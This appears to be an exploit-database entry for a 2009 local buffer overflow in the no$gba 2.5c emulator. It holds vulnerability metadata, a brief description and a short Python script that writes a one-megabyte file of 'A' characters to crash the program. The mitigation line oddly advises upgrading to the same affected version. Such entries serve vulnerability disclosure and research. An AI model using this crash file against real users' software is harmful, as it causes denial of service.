header-logo
Suggest Exploit
vendor:
no$gba
by:
l3D
7,5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: no$gba
Affected Version From: 2.5c
Affected Version To: 2.5c
Patch Exists: YES
Related CWE: N/A
CPE: no$gba
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2009

no$gba 2.5c (.nds) local crash

A buffer overflow vulnerability exists in no$gba 2.5c (.nds) which allows a local attacker to crash the application by creating a specially crafted .nds file containing an overly long string of 'A' characters. This can be exploited to cause a denial of service condition.

Mitigation:

Upgrade to the latest version of no$gba 2.5c (.nds)
Source

Exploit-DB raw data:

#!/usr/bin/env python
#no$gba 2.5c (.nds) local crash
#Software Link: http://nocash.emubase.de/no$gba-w.zip
#Author: l3D
#Site: http://xraysecurity.blogspot.com
#IRC: irc://irc.nix.co.il
#Email: pupipup33@gmail.com

bad=file('crash.nds', 'w')
bad.write('A'*0x100000)
bad.close()